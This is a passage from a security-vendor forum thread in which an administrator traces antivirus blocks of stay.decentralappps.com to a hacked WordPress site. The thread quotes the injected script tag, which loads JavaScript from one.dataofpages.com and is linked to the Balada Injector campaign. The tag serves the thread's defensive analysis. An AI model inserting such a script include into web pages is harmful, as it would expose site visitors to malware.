Jump to content

stay.decentralappps.com


kapela86

Recommended Posts

I'm getting lots of reports in ESET Protect from different computers that this website "stay.decentralappps.com" was "Blocked by internal blacklist". What I don't know is how this is triggered, what website tried to load it, because all reports come from different browsers.

Link to comment
Share on other sites

  • Administrators

To me it looks like SSL/TLS filtering is not working properly, otherwise Web access protection should have detected a malicious JS before it could be executed:

image.png

Is the eicar test file downloaded from https://secure.eicar.org/eicar_com.zip detected upon download?

image.png

Link to comment
Share on other sites

Here's SysInspector log

And about eicar, it was detected before browser even downloaded it, but I tested this on my computer, not the one I sent those reports. All computers have same policy, except some computers where I use Web Filtering with "*" Blocked and I allow specific domains. These logs are from that kind of computer.

image.thumb.png.59a5ccf66cfdb94663059814f7433131.png

SysInspector log export 2023-09-21 16-30-12.zip

Link to comment
Share on other sites

The Eicar .zip download should have been blocked by Web Access protection; i.e. HTTP filter;

Time;Scanner;Object type;Object;Detection;Action;User;Information;Hash;First seen here
9/21/2023 11:09:05 AM;HTTP filter;file;https://secure.eicar.org/eicar_com.zip;Eicar test file;connection terminated;xxxxxx;Event occurred during an attempt to access the web by the application: C:\Program Files\Mozilla Firefox\firefox.exe (1EA307959A891AA89787D5101669BB3587D8C48C).;D27265074C9EAC2E2122ED69294DBC4D7CCE9141;

 

Link to comment
Share on other sites

  • Administrators

Are you able to reproduce the detection? If so, is it enough to open Edge or the threat is detected after you have opened a specific website?

Link to comment
Share on other sites

If you are talking about stay.decentralappps.com then I can't reproduce it because I don't know what website triggers this, I could check tomorrow on other pc it's web browser history.

And regarding SSL/TLS filtering not working, what do you propose to do?

Link to comment
Share on other sites

  • Administrators
2 minutes ago, kapela86 said:

And regarding SSL/TLS filtering not working, what do you propose to do?

It's working, I removed my comment. I was looking at the Process column and because of that I erroneously assumed that the detection was triggered on a disk.

Link to comment
Share on other sites

1 minute ago, Marcos said:

It's working, I removed my comment. I was looking at the Process column and because of that I erroneously assumed that the detection was triggered on a disk.

Perhaps not on Chrome? Op's screen shot shows Eicar .zip detection on disk; not via HTTP filter.

Link to comment
Share on other sites

  • Administrators

HTTPS scanning works, obviously the connection was terminated and URI contains an https address. Let's try to reproduce the detection first.

Link to comment
Share on other sites

Looks like it's

epainfo.pl

there is a 

<_script src="https://one.dataofpages.com/stats/post.js" id="temp_weather_script"></script>

in source, they use Wordpress so it's probably some out of date plugin that got hacked.

Edited by kapela86
Link to comment
Share on other sites

5 hours ago, kapela86 said:

It kinda sux that you can't see what URL user visited that triggered this script. This would be very usefull.

Example of Balada Injector malware deploying stay.decentralappps.com given in this article: https://www.geoedge.com/balda-injectors-2-0-evading-detection-gaining-persistence/ .

Bottom line is any legit but vulnerable web site can be nailed by this.

Link to comment
Share on other sites

Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...